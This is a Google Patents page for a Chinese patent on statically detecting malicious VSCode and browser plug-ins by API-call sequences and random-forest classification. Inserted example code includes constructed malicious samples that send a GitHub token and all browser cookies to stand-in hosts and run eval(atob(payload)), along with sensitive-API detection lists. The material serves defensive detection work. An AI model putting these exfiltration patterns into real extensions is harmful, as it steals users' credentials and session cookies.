CN117708813B - A security detection method and system for software development environment - Google Patents
A security detection method and system for software development environment

Publication number: CN117708813B (application CN202311618733.7A)
Authority: CN (China)
Prior art keywords: plug-ins, malicious, API call, call sequence
Legal status: Active
Classifications
- G06F21/563: Static detection by source code analysis (G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity; G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms; G06F21/55 Detecting local intrusion or implementing counter-measures; G06F21/56 Computer malware detection or handling; G06F21/562 Static detection)
- G06F18/24323: Tree-organised classifiers (G06F18/00 Pattern recognition; G06F18/20 Analysing; G06F18/24 Classification techniques; G06F18/243 Classification techniques relating to the number of classes)
Abstract
The invention discloses a security detection method and system for a software development environment. The method comprises: screening the code-editor (Visual Studio Code) plug-ins and browser plug-ins to be examined against a blacklist; statically extracting the code behaviour of plug-ins not on the blacklist, using an abstract syntax tree combined with regular-expression matching to obtain the API call sequence of the code; modelling malicious plug-in behaviour through feature engineering and statically deciding with a random forest classifier whether a plug-in is malicious; and, for plug-ins judged malicious, further classifying them with a hierarchical classifier to obtain the specific malicious category. The invention also provides a system implementing the method, which can analyse browser plug-ins and code-editor plug-ins of the development environment online and scan them locally, giving comprehensive security detection for both plug-in types. The invention identifies malicious plug-in behaviour effectively, classifies it precisely, and thereby gives software developers more comprehensive security protection.
Description
Technical Field
The present invention relates to network security technology, and in particular to a security detection method and system for a software development environment.
Background
As the software development ecosystem keeps expanding, developer-tool plug-ins are used more and more widely and development environments become more complex, so the security of the development environment is hard to guarantee. An attacker can use a malicious third-party plug-in introduced into the software development environment to steal sensitive data from that environment, causing data leakage, or to inject malicious code into the programs being developed, which is a serious security risk. Detecting the malicious plug-ins present in a developer's current environment therefore helps to protect developers at the development-tool stage.

In the prior art there is no method or system that comprehensively scans and checks both the code-editor plug-ins and the browser plug-ins of a development environment. For browser plug-in security checking, Cisco's Duo Security released CRXcavator, an automated Chrome extension security assessment tool: a user logs in to the platform and looks up a Chrome extension by name or extension ID to obtain a risk score and an analysis report for that extension. It has the following drawbacks: users can only search by extension name or ID and cannot submit a not-yet-analysed plug-in for online analysis; it is tied to one platform and cannot check plug-ins of other platforms; and it cannot check the plug-ins installed in a developer's local environment, so it cannot protect that environment. For malicious JavaScript detection, Aurore Fass et al. proposed JStap, a modular static JavaScript detection system that extends lexical and AST-based detection with control-flow and data-flow information; however, it only classifies code as malicious or benign and cannot further classify the specific malicious behaviour of the code.
Summary of the Invention
In view of this, the object of the present invention is to provide a security detection method and system for a software development environment that can analyse the security of the Visual Studio Code (VSCode) editor plug-ins and browser plug-ins used by developers; that extracts API call sequences accurately by combining an abstract syntax tree (AST) with regular expressions; that models plug-in behaviour so that the model detects malicious plug-ins efficiently; that identifies the specific category of a malicious plug-in through a hierarchical classifier running from API to sensitive behaviour to malicious plug-in category, giving precise multi-class detection; and that can analyse browser plug-ins and code-editor plug-ins of the software development environment online and scan them locally, achieving comprehensive security detection of both plug-in types and protecting developers.
To achieve the above object, the present invention is implemented by the following technical solution.
A first aspect of the present invention provides a security detection method for a software development environment, comprising the following steps:
S100: screen the VSCode plug-ins and web browser plug-ins to be examined against a blacklist to determine whether they are known malicious plug-ins;
S200: for the plug-ins from S100 that are not on the malicious-plug-in blacklist, statically extract code behaviour, obtaining the API call sequence of the code efficiently by using an abstract syntax tree combined with regular-expression matching;
S300: on the basis of the API call sequence extracted in S200, model malicious plug-in behaviour through feature engineering and statically detect maliciousness with a random forest classifier, classifying each plug-in as malicious or benign;
S400: for the plug-ins that S300 outputs as malicious, map the API call sequence to specific sensitive behaviours with a hierarchical classifier, then classify the malicious plug-in according to the order of those behaviours to obtain its malicious category.
Preferably, in S100 the blacklist-based malicious plug-in detection specifically comprises:
S110: collect publicly recognised malicious plug-in data from the Internet, merge it with the malicious plug-in information detected and verified by the detection process of the present invention to build a malicious-plug-in blacklist, and synchronise newly discovered malicious plug-in information periodically so that the blacklist stays comprehensive and current;
S120: look up the unique identifier (ID) of the plug-in under examination in the blacklist built in S110; if the ID is present in the blacklist, mark the plug-in as malicious.
Preferably, in S200 the static extraction of plug-in code behaviour specifically comprises:
S210: first attempt to parse the source code into an abstract syntax tree and obtain the API call sequence by traversing the generated tree;
S220: if generation of the abstract syntax tree fails, fall back to regular-expression matching: first identify all sensitive API calls in the source code, then order the API calls with a specific algorithm.
Preferably, obtaining the API call sequence with the abstract syntax tree specifically comprises:
S211: parse the source code into an abstract syntax tree with a syntax parser;
S212: traverse the generated abstract syntax tree level by level to obtain the custom-function-declaration subtrees and the remaining-code subtrees, and enqueue each kind into its own queue;
S213: dequeue the custom-function-declaration subtrees one at a time and traverse each dequeued subtree in pre-order to collect sensitive API calls. If a custom function calls another custom function whose traversal is already complete, insert the callee's API call sequence into the calling function's sequence; if the callee has not been updated yet, re-enqueue the subtree. Once a custom function's API call sequence is complete, mark it as updated; this continues until the API call sequences of all custom functions have been updated;
S214: dequeue the remaining-code subtrees one at a time and traverse each in pre-order to collect sensitive API calls; when the current node is a call to a custom function, append that function's ordered API call sequence to the end of the source-file API call sequence;
S215: repeat S213 and S214 until both the custom-function-declaration subtree queue and the remaining-code subtree queue are empty, then output the API call sequence.
Preferably, obtaining the API call sequence with regular-expression matching specifically comprises:
S221: match the text range of each function definition block with regular expressions;
S222: identify all sensitive API calls in the source file and sort them by the relative text position of each call using selection sort;
S223: add the API calls that lie inside a function definition block to the call sequence of the corresponding custom function;
S224: update the API call sequence of each custom function recursively by inserting the sorted API call sequences of the functions called inside its definition block into its own sequence, until all custom functions have been updated;
S225: remove from the source file's API call sequence all API calls that lie inside function definition blocks;
S226: identify the calls to custom functions in the source file and insert each function's API call sequence into the source file's sequence at the position of the call.
Preferably, in S300 the static detection of plug-in maliciousness specifically comprises:
S310: from the analysis of malicious plug-in samples, define behaviour-sequence features for judging whether a plug-in shows suspicious behaviour, each feature being an ordered combination of several behaviours that represents one specific sensitive behaviour;
S320: map the API call sequence extracted in S200 to a behaviour-sequence feature vector;
S330: feed the feature vector into the trained random forest classifier for prediction; the random forest consists of multiple decision trees, each of which evaluates the feature vector, and the final classification is decided by majority vote.
Preferably, the random forest classifier is trained as follows:
S331: build a dataset containing benign and malicious samples;
S332: extract the defined behaviour-sequence features from the dataset by static analysis to form a behaviour feature matrix;
S333: split the whole dataset into a training set and a test set in the ratio 8:2 for model training and evaluation;
S334: draw random samples from the training set and build a decision tree for each sample, each tree splitting on the best feature to increase node purity;
S335: use grid search over the key parameters of the random forest model, including the number of trees and the tree depth, to select the best parameters;
S336: evaluate the model on the test set and save the best-performing model for future prediction tasks.
The present invention also provides a security detection system for a software development environment, comprising:
User interaction and security posture module: provides an interactive interface for searching for and uploading plug-ins to be examined or scanning locally installed plug-ins, and displays the security status of the development environment, detection results and the history of past checks;
Plug-in information acquisition module: automatically collects plug-in source code from plug-in marketplaces or platforms as the data basis for security analysis;
Client local development environment security detection module: runs on the user side, automatically scans the specified plug-in installation paths and obtains the VSCode plug-ins and browser plug-ins installed in the local development environment;
Plug-in maliciousness static detection module: extracts API call sequences using an abstract syntax tree combined with regular-expression matching and judges plug-in maliciousness with the random forest model;
Plug-in malicious behaviour determination module: determines the category of a malicious plug-in; for a plug-in preliminarily judged malicious, it maps the API call sequence to specific sensitive behaviours with the hierarchical classifier and classifies the plug-in according to the order of those behaviours to obtain the malicious category;
User management module: handles user registration, login and permission checks, ensuring secure access to each user's security status and historical detection data;
Data storage module: stores all data, including plug-in information, detection results, user configuration and system logs, ensuring data security and integrity.
Compared with the prior art, the beneficial effects of the present invention are as follows: by combining static code analysis, machine-learning classification and hierarchical behaviour classification, the invention provides a comprehensive and precise security detection method for development environments; compared with the prior art it identifies malicious plug-ins more effectively and classifies malicious behaviour precisely into multiple categories, giving developers' code editors and browsers more comprehensive protection.
Brief Description of the Drawings
FIG. 1 is the overall flow chart of the first embodiment of the present invention;
FIG. 2 is the flow chart of obtaining the API call sequence with an abstract syntax tree in the first embodiment;
FIG. 3 is the flow chart of obtaining the API call sequence with regular-expression matching in the first embodiment;
FIG. 4 is the system structure diagram of the second embodiment;
FIG. 5 is the system flow chart of the second embodiment.
Detailed Description
The specific implementation of the present invention is described in further detail below with reference to the drawings and specific embodiments. The following embodiments and drawings illustrate the invention but do not limit its scope.
Embodiment 1:
A security detection method for a software development environment, see FIG. 1, comprises the following steps:
S100: screen the VSCode plug-ins and web browser plug-ins to be examined against a blacklist to determine whether they are known malicious plug-ins.
In one embodiment, S100 comprises the following steps:
S110: collect publicly recognised malicious plug-in data from the Internet, merge it with the malicious plug-in information detected and verified by the detection process of the present invention to build a malicious-plug-in blacklist, and synchronise newly discovered malicious plug-in information periodically so that the blacklist stays comprehensive and current.
The Internet sources of malicious plug-in data include samples published by the security companies Snyk, Kaspersky and Threatmon. Compared with existing solutions, this embodiment not only gathers data from several sources on the Internet but also adds, on top of the published data, the malicious plug-ins detected and confirmed during its own checking of VSCode and browser plug-ins, which better addresses the incomplete coverage, narrow perspective, insufficient description and untimely updates of a single data source.
S120: look up the unique identifier (ID) of the plug-in under examination in the blacklist built in S110; if the ID is present in the blacklist, mark the plug-in as malicious.
S200: for the plug-ins from S100 that are not on the malicious-plug-in blacklist, statically extract code behaviour, obtaining the API call sequence of the code efficiently by using an abstract syntax tree combined with regular-expression matching.
Specifically, this embodiment adopts the strategy "abstract syntax tree first, regular-expression matching as a supplement" to make full use of the tree's precision in syntactic analysis and in identifying sensitive API calls. Because JavaScript syntax is diverse and parsing tools have inherent limitations, regular-expression matching serves as a supplement when ordinary syntactic analysis fails, compensating for the tree's inability to parse certain complex constructs. Compared with the prior art, the extraction method of this embodiment stays compatible with a wide range of coding styles and patterns, handles successive iteration and recursion, and strengthens the analysis of nested and complex function structures.
In one embodiment, S200 comprises the following steps:
S210: first attempt to parse the source code into an abstract syntax tree and obtain the API call sequence by traversing the generated tree.
During traversal of the abstract syntax tree, because the API call nodes inside a function declaration block do not execute at the place where they are declared, the subtrees are divided into two classes when the tree is parsed: subtrees that represent custom function declaration blocks, and all remaining subtrees as the second class. The API call sequence obtained by traversing the second class represents the order of API calls when the code actually executes. Custom function subtrees are traversed in the same order as the second class to update each custom function's ordered API call sequence, which is inserted into the sorted sequence at the point where the function is called.
Referring to FIG. 2, in one embodiment, obtaining the API call sequence with the abstract syntax tree comprises the following steps:
S211: parse the source code into an abstract syntax tree with a syntax parser.
Specifically, the syntax parser is Esprima, a popular high-performance ECMAScript parser.
S212: traverse the generated abstract syntax tree level by level to obtain the custom-function-declaration subtrees and the remaining-code subtrees, and enqueue each kind into its own queue.
S213: dequeue the custom-function-declaration subtrees one at a time and traverse each dequeued subtree in pre-order to collect sensitive API calls; if a custom function calls another custom function whose traversal is already complete, insert the callee's API call sequence into the calling function's sequence; if the callee has not been updated yet, re-enqueue the subtree; once a custom function's API call sequence is complete, mark it as updated, and continue until the API call sequences of all custom functions have been updated.
S214: dequeue the remaining-code subtrees one at a time and traverse each in pre-order to collect sensitive API calls; when the current node is a call to a custom function, append that function's ordered API call sequence to the end of the source-file API call sequence.
S215: repeat S213 and S214 until both the custom-function-declaration subtree queue and the remaining-code subtree queue are empty, then output the API call sequence.
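The queue-based procedure S211 to S215, as an added worked example; this is not code from the patent. The patent parses JavaScript with Esprima; to stay runnable without third-party packages this example applies the same two-queue algorithm to Python source using the standard-library ast module, and the set of sensitive API names is an assumption for the example (the patent does not publish its list). The handling of mutual recursion (accepting a partial sequence once every queued function has stalled) is also an assumption; the patent does not specify it.

```python
import ast
from collections import deque

# Sensitive API names assumed for this example; the patent does not publish its own list.
SENSITIVE_APIS = {"os.environ.get", "urllib.request.urlopen", "subprocess.run", "exec", "open"}


def callee_name(call: ast.Call) -> str:
    """Dotted name of a call's callee, e.g. 'urllib.request.urlopen'; '' for non-name callees."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def preorder(node: ast.AST):
    """Pre-order traversal (node first, then its children in source order), as in S213/S214."""
    yield node
    for child in ast.iter_child_nodes(node):
        yield from preorder(child)


def extract_api_sequence(source: str) -> list[str]:
    """S211-S215: ordered sensitive API calls of `source`, custom functions inlined at call sites."""
    tree = ast.parse(source)                                            # S211
    func_queue, rest_queue = deque(), deque()                            # S212: two queues
    for stmt in tree.body:                                              # level-order split at module level
        is_func = isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef))
        (func_queue if is_func else rest_queue).append(stmt)
    declared = {fn.name for fn in func_queue}
    func_seqs: dict[str, list[str]] = {}                                # name -> sequence, once "updated"

    def walk_calls(subtree: ast.AST, current: str = ""):
        """Sensitive calls of one subtree in pre-order; flags callees that are not updated yet."""
        seq, unresolved = [], False
        for node in preorder(subtree):
            if not isinstance(node, ast.Call):
                continue
            name = callee_name(node)
            if name in declared and name != current:                    # call to a custom function
                if name in func_seqs:
                    seq.extend(func_seqs[name])                         # inline its ordered sequence
                else:
                    unresolved = True
            elif name in SENSITIVE_APIS:
                seq.append(name)
        return seq, unresolved

    stalls = 0
    while func_queue:                                                   # S213
        fn = func_queue.popleft()
        seq, unresolved = walk_calls(fn, current=fn.name)               # direct self-recursion is skipped
        if unresolved and stalls <= len(func_queue):
            func_queue.append(fn)                                       # callee not updated yet: re-enqueue
            stalls += 1
            continue
        # Mark as updated. If every remaining function stalled (mutual recursion), the partial
        # sequence is accepted so the loop terminates; this is an assumption of the example.
        func_seqs[fn.name] = seq
        stalls = 0

    file_seq: list[str] = []
    while rest_queue:                                                   # S214
        seq, _ = walk_calls(rest_queue.popleft())                       # custom calls inlined where called
        file_seq.extend(seq)
    return file_seq                                                     # S215


# Constructed sample in the style of a token-stealing plug-in (not a real sample).
SAMPLE_SOURCE = '''
import os, subprocess, urllib.request

def collect():
    return os.environ.get("GITHUB_TOKEN")

def send(payload):
    urllib.request.urlopen("https://example.invalid/collect", data=payload)

def exfil():
    data = collect()
    send(data)

exfil()
subprocess.run(["git", "config", "--list"])
'''

if __name__ == "__main__":
    print(extract_api_sequence(SAMPLE_SOURCE))
```

Running the block on the constructed sample yields the sequence os.environ.get, urllib.request.urlopen, subprocess.run: exfil is resolved only after collect and send have been marked updated, and its inlined sequence is emitted where exfil() is called, not where it is declared. One caveat of pre-order: for a nested call such as send(collect()) the outer call node is visited before the call in its argument, so the recorded order would be send then collect, whereas at run time the argument is evaluated first; a post-order visit of argument expressions matches evaluation order.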
S220: if generation of the abstract syntax tree fails, fall back to regular-expression matching: first identify all sensitive API calls in the source code, then order the API calls with a specific algorithm.
Referring to FIG. 3, in one embodiment, obtaining the API call sequence with regular-expression matching comprises the following steps:
S221: match the text range of each function definition block with regular expressions.
S222: identify all sensitive API calls in the source file and sort them by the relative text position of each call using selection sort.
S223: add the API calls that lie inside a function definition block to the call sequence of the corresponding custom function.
S224: update the API call sequence of each custom function recursively by inserting the sorted API call sequences of the functions called inside its definition block into its own sequence, until all custom functions have been updated.
S225: remove from the source file's API call sequence all API calls that lie inside function definition blocks.
S226: identify the calls to custom functions in the source file and insert each function's API call sequence into the source file's sequence at the position of the call.
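The fallback S221 to S226 as an added worked example, again not code from the patent: a Python function that applies the text-position approach to JavaScript source when no parser is available. The function-block matcher (a named-function head located by regular expression, with the body extent found by brace counting) and the sensitive API list are assumptions of this example; the patent only says that function definition blocks are matched by regular expression. Python's sorted() replaces the selection sort named in S222, which gives the same order.

```python
import re

# Sensitive browser/Node API names assumed for this example; the patent does not publish its list.
SENSITIVE_APIS = ["chrome.cookies.getAll", "chrome.tabs.update", "fetch", "eval", "fs.writeFileSync"]

# S221: head of a named function; the body extent is found by counting braces from the opening '{'.
FUNC_HEAD = re.compile(r"\bfunction\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{")


def function_blocks(src: str) -> dict[str, tuple[int, int]]:
    """Map each named function to the [start, end) text range of its definition block."""
    blocks = {}
    for m in FUNC_HEAD.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)      # braces inside strings/comments are not special-cased
            i += 1
        blocks[m.group(1)] = (m.start(), i)
    return blocks


def positioned_calls(names, text: str, offset: int = 0) -> list[tuple[int, str]]:
    """(position, name) for every call `name(` in `text`, ordered by text position (S222)."""
    hits = []
    for name in names:
        for m in re.finditer(r"(?<![\w$])" + re.escape(name) + r"\s*\(", text):
            hits.append((offset + m.start(), name))
    return sorted(hits)


def extract_api_sequence_regex(src: str) -> list[str]:
    """S221-S226: ordered sensitive API calls of `src`, custom functions inlined at their call positions."""
    blocks = function_blocks(src)                                        # S221

    def owner(pos: int):
        return next((n for n, (s, e) in blocks.items() if s <= pos < e), None)

    func_calls = {name: [] for name in blocks}
    file_calls = []
    for pos, api in positioned_calls(SENSITIVE_APIS, src):               # S222
        o = owner(pos)
        (func_calls[o] if o else file_calls).append((pos, api))          # S223 / S225

    memo: dict[str, list[str]] = {}

    def resolve(name: str, stack=()) -> list[str]:
        """S224: a function's sequence with the custom functions it calls inlined at their call positions."""
        if name in memo:
            return memo[name]
        if name in stack:                                                # recursion guard (assumption)
            return []
        s, e = blocks[name]
        items = [(pos, [api]) for pos, api in func_calls[name]]
        others = [n for n in blocks if n != name]                        # the function's own head is not a call
        for pos, callee in positioned_calls(others, src[s:e], offset=s):
            items.append((pos, resolve(callee, stack + (name,))))
        memo[name] = [api for _, seq in sorted(items, key=lambda t: t[0]) for api in seq]
        return memo[name]

    items = [(pos, [api]) for pos, api in file_calls]
    for pos, name in positioned_calls(blocks, src):                      # S226
        if owner(pos) is None:                                           # a call site, not a definition head
            items.append((pos, resolve(name)))
    return [api for _, seq in sorted(items, key=lambda t: t[0]) for api in seq]


# Constructed JavaScript in the style of a cookie-stealing browser extension (not a real sample).
SAMPLE_JS = r'''
function grab() {
  chrome.cookies.getAll({}, function (cookies) {
    fetch("https://example.invalid/c", { method: "POST", body: JSON.stringify(cookies) });
  });
}
function hijack(tabId) { chrome.tabs.update(tabId, { url: "https://example.invalid/ad" }); }
function run() {
  grab();
  hijack(1);
}
run();
eval(atob(payload));
'''

if __name__ == "__main__":
    print(extract_api_sequence_regex(SAMPLE_JS))
```

On the constructed sample the result is chrome.cookies.getAll, fetch, chrome.tabs.update, eval: the calls inside grab and hijack are moved to where run() invokes them, and the definition heads are never treated as calls. Because the matcher counts raw braces, a brace inside a string literal or comment shifts a block boundary; that is the kind of inaccuracy that makes the AST path the primary one and this path the fallback.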
S300: on the basis of the API call sequence extracted in S200, model malicious plug-in behaviour through feature engineering and statically detect maliciousness with a random forest classifier, classifying each plug-in as malicious or benign.
In a real production environment the proportion of malicious plug-ins is extremely low, so a preliminary static maliciousness judgement that quickly rules out most normal plug-ins saves a great deal of resources and detection latency and improves detection efficiency.
In one embodiment, the static detection of plug-in maliciousness comprises the following steps:
S310: from the analysis of malicious plug-in samples, define behaviour-sequence features for judging whether a plug-in shows suspicious behaviour, each feature being an ordered combination of several behaviours that represents one specific sensitive behaviour.
For example, one feasible set of behaviour-sequence features is: outbound transmission of sensitive information; querying system environment variables; downloading content and executing it; writing a file and executing it; reading file contents and executing them; reading a file and dynamically executing code; changing file permissions and creating a process; identifying the operating-system platform; modifying the data flow of system command results; executing system commands; and performing sensitive file operations. Each behaviour-sequence feature is a combination of several behaviours; for example, outbound transmission of sensitive information consists of two behaviours: first accessing sensitive information, then making a network request that sends it out.
S320: map the API call sequence extracted in S200 to a behaviour-sequence feature vector.
S330: feed the feature vector into the trained random forest classifier for prediction; the random forest consists of multiple decision trees, each of which evaluates the feature vector, and the final classification is decided by majority vote.
Preferably, the random forest classifier is trained as follows:
S331: Construct a dataset containing both benign and malicious samples.
Specifically, one feasible way to construct the dataset is to select malicious samples from the malicious plug-in information published by the well-known security companies Snyk, Kaspersky and Threatmon, and to select plug-ins with high download counts and high user ratings from the official plug-in marketplace rankings as benign samples.
S332: Using static analysis, extract the defined behavior sequence features from the dataset to form a behavior feature matrix.
S333: Divide the entire dataset into a training set and a test set in an 8:2 ratio, for model training and evaluation.
S334: Randomly sample the training dataset and build a decision tree for each sampled feature set; each tree splits by selecting the best feature so as to improve node purity.
S335: Use grid search to traverse the key parameters of the random forest model, including the number of classifiers and the decision tree depth, and select the optimal model parameters.
S336: Evaluate the model's performance on the test set and save the best-performing model for future prediction tasks.
Specifically, in this embodiment the model file is saved in Joblib format.
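As an added illustration of the training procedure in S331 to S336 (not code from the patent), the following Python script builds a constructed behavior-feature matrix, performs the 8:2 split, grid-searches the number of trees and the tree depth, evaluates on the held-out set and saves the best model in Joblib format. The scikit-learn and joblib APIs are an assumed implementation stack, and the dataset is a toy stand-in for features extracted by static analysis.

```python
"""Added example (not the patent's code): trains the S331-S336 random-forest
classifier on a constructed behaviour-feature matrix, using scikit-learn and
joblib as the assumed implementation stack."""
import random
import tempfile
from pathlib import Path

import joblib
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import GridSearchCV, train_test_split

N_FEATURES = 6  # one column per behaviour-sequence feature (S332)

def build_dataset(n_per_class=40, seed=0):
    """Constructed toy matrix standing in for S331/S332 output: malicious rows
    fire 2-4 behaviour-sequence features, benign rows fire none."""
    rng = random.Random(seed)
    X, y = [], []
    for _ in range(n_per_class):
        malicious = [0] * N_FEATURES
        for idx in rng.sample(range(N_FEATURES), rng.randint(2, 4)):
            malicious[idx] = 1
        X += [malicious, [0] * N_FEATURES]
        y += [1, 0]
    return X, y

def train_and_save(X, y, model_path=None):
    """S333-S336: 8:2 split, grid search over tree count and depth, evaluate on
    the held-out 20 %, persist the best model with joblib; returns its path."""
    X_tr, X_te, y_tr, y_te = train_test_split(
        X, y, test_size=0.2, random_state=0, stratify=y)
    grid = {"n_estimators": [10, 50], "max_depth": [4, None]}  # S335
    search = GridSearchCV(RandomForestClassifier(random_state=0), grid, cv=3)
    search.fit(X_tr, y_tr)  # S334: bootstrap-sampled trees, best-feature splits
    best = search.best_estimator_
    acc = accuracy_score(y_te, best.predict(X_te))  # S336
    if model_path is None:
        model_path = Path(tempfile.mkdtemp()) / "plugin_rf.joblib"
    joblib.dump(best, model_path)
    return acc, search.best_params_, model_path

def predict_saved(model_path, feature_vector):
    """S330: reload the saved model and let its trees vote on one S320 vector."""
    model = joblib.load(model_path)
    return int(model.predict([feature_vector])[0])

if __name__ == "__main__":
    acc, params, path = train_and_save(*build_dataset())
    print(f"held-out accuracy={acc:.2f} best params={params}")
    print("malicious" if predict_saved(path, [1, 1, 1, 0, 0, 0]) else "benign")
```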
S400: For plug-ins that S300 outputs as malicious, a hierarchical classifier maps the API call sequence to specific sensitive behaviors, and the malicious plug-in is then classified according to the order of these behaviors to obtain its malicious plug-in category.
Specifically, the hierarchical classifier has three layers, from top to bottom: malicious plug-in category, sensitive behavior category, and sensitive API.
For the malicious plug-in category, based on a study of existing malicious plug-in reports and manual analysis of malicious samples, one feasible classification of malicious plug-in behavior is: sensitive information theft, sensitive file operation, malicious command execution, code injection, ad injection, and browser hijacking.
The behavior of a malicious plug-in is composed of a series of sensitive behaviors, so this embodiment associates each malicious plug-in category with a corresponding sensitive behavior sequence. For example, the sensitive information theft category follows the behavior order "first access sensitive information, then send it over the network". One feasible definition of the sensitive behavior categories is: network sending, network downloading, file reading, file deletion, file modification, file creation, code execution, system command execution, external program execution, process information, system information acquisition, and sensitive file operation.
Sensitive behaviors cannot be realized without API calls, so this embodiment associates sensitive behavior sequences with sensitive API call sequences. One feasible way to define sensitive APIs is to take the APIs collected in existing research, combine them with analysis of malicious samples, and define the APIs that can be used for malicious purposes.
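The following Python code is an added example (not the patent's implementation) of the S310/S320 feature mapping and of the three-layer hierarchy of S400: a constructed API-to-behavior table stands in for the sensitive API definitions, and the ordered behavior rules and category names are illustrative assumptions, not the patent's actual lists.

```python
"""Added example (not the patent's code): maps a statically extracted API call
sequence to ordered behaviour-sequence features (S310/S320) and on to a malicious
plug-in category through the three-layer hierarchy (S400). API names, behaviour
labels and rules are constructed illustrations, not the patent's own lists."""

# Layer 3 -> layer 2: sensitive API -> sensitive behaviour category.
API_TO_BEHAVIOR = {
    "process.env": "system_info",
    "fs.readFileSync": "file_read",
    "fs.chmodSync": "file_modify",
    "https.request": "network_send",
    "http.get": "network_download",
    "eval": "code_exec",
    "child_process.exec": "system_command",
}

# S310 behaviour-sequence features, each an ordered tuple of behaviours, paired
# with the layer-1 malicious category (S400) that the sequence indicates.
RULES = [
    (("system_info", "network_send"), "sensitive_information_theft"),
    (("file_read", "network_send"), "sensitive_information_theft"),
    (("network_download", "code_exec"), "code_injection"),
    (("file_read", "code_exec"), "code_injection"),
    (("file_modify", "system_command"), "malicious_command_execution"),
    (("system_command",), "malicious_command_execution"),
]

def api_to_behaviors(api_calls):
    """Keep only sensitive APIs, preserving source order (layer 3 -> layer 2)."""
    return [API_TO_BEHAVIOR[a] for a in api_calls if a in API_TO_BEHAVIOR]

def contains_ordered(seq, pattern):
    """True if pattern is an in-order (not necessarily adjacent) subsequence of
    seq; the order is what separates 'read then send' from 'send then read'."""
    it = iter(seq)
    return all(any(b == p for b in it) for p in pattern)

def feature_vector(api_calls):
    """S320: one binary entry per behaviour-sequence feature, fed to the forest."""
    behaviors = api_to_behaviors(api_calls)
    return [int(contains_ordered(behaviors, pat)) for pat, _ in RULES]

def classify_malicious(api_calls):
    """S400: categories whose ordered behaviour rule fires, in first-match order."""
    behaviors = api_to_behaviors(api_calls)
    hits = [cat for pat, cat in RULES if contains_ordered(behaviors, pat)]
    return list(dict.fromkeys(hits))  # dedupe, keep order

if __name__ == "__main__":
    # Constructed call sequence from a hypothetical plug-in, in source order.
    calls = ["fs.readFileSync", "JSON.parse", "https.request"]
    print(feature_vector(calls), classify_malicious(calls))
```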
Embodiment 2:
A security detection system for a software development environment, see FIG. 4, comprising the following modules:
User interaction and security posture module: provides an interactive interface for searching for plug-ins, uploading plug-ins to be checked, or scanning locally installed plug-ins, and displays the security status of the development environment, detection results and historical detection records.
Plug-in information acquisition module: automatically collects plug-in source code from plug-in marketplaces or platforms, providing the data basis for security analysis.
Client local development environment security detection module: runs on the user side, automatically scans the specified plug-in installation paths, and obtains the VSCode plug-ins and browser plug-ins installed in the local development environment.
Plug-in maliciousness static detection module: extracts API call sequences using abstract syntax trees combined with regular expression matching, and uses the random forest model to determine whether a plug-in is malicious.
Plug-in malicious behavior determination module: determines the category of a malicious plug-in. For plug-ins preliminarily determined to be malicious, this module uses the hierarchical classifier to map the API call sequence to specific sensitive behaviors, then classifies the malicious plug-in according to the order of these behaviors to obtain its malicious plug-in category.
User management module: handles user registration, login and permission verification, ensuring secure access to personalized security status and historical detection data.
Data storage module: stores all data, including plug-in information, detection results, user configuration and system logs, ensuring data security and integrity.
The usage flow of this system is shown in FIG. 5 and comprises the following steps:
Step 1: The user logs in to the detection website homepage and selects a detection method. For example, the user may search for a plug-in via the input box, upload a plug-in archive, or scan local plug-ins.
Step 2: Perform the processing corresponding to the detection method selected by the user.
Step 2.1: If the user chooses to search for a plug-in via the input box, the database is queried using the entered plug-in name or plug-in URL. If the plug-in already exists in the database, the plug-in information stored in the database is output directly; if it does not, the plug-in archive is downloaded by a web crawler and passed to the next step.
Step 2.2: If the user chooses to upload a plug-in archive, the archive is passed to the next step.
Step 2.3: If the user chooses to scan local plug-ins, the user downloads the local scanning program and runs a scan of the local environment's plug-ins. Each plug-in found is looked up in the database; if it already exists there, the stored plug-in information is output directly, and if it does not, the plug-in archive is passed to the next step.
Step 3: The input plug-in archive is passed through the plug-in maliciousness static detection module, which preliminarily classifies the plug-in as malicious or benign; plug-ins preliminarily classified as malicious are passed to the next step.
Step 4: Plug-ins preliminarily classified as malicious are passed through the plug-in malicious behavior determination module, which classifies them as sensitive information theft, sensitive file operation, malicious command execution, code injection, ad injection or browser hijacking.
Step 5: The detection results are displayed to the user and stored in the database.
It should be noted that this system specifically implements the detection method described in detail in Embodiment 1 and integrates it into an automated workflow, improving detection efficiency and user interactivity. In addition, the system's design allows flexible extension and updating to adapt to new security threats and plug-in characteristics.
Those skilled in the art should understand that the embodiments described in the specification are all preferred embodiments and should not be regarded as excluding other embodiments. Those skilled in the art may modify the actions and processes involved in the present embodiments, and any modification within the spirit and scope of the present invention shall fall within the scope of protection of the claims appended to the present invention.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title | 
|---|---|---|---|
| CN202311618733.7A CN117708813B (en) | 2023-11-30 | 2023-11-30 | A security detection method and system for software development environment | 
Publications (2)
| Publication Number | Publication Date | 
|---|---|
| CN117708813A CN117708813A (en) | 2024-03-15 | 
| CN117708813B true CN117708813B (en) | 2024-06-21 | 
Legal Events
| Date | Code | Title | Description | 
|---|---|---|---|
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||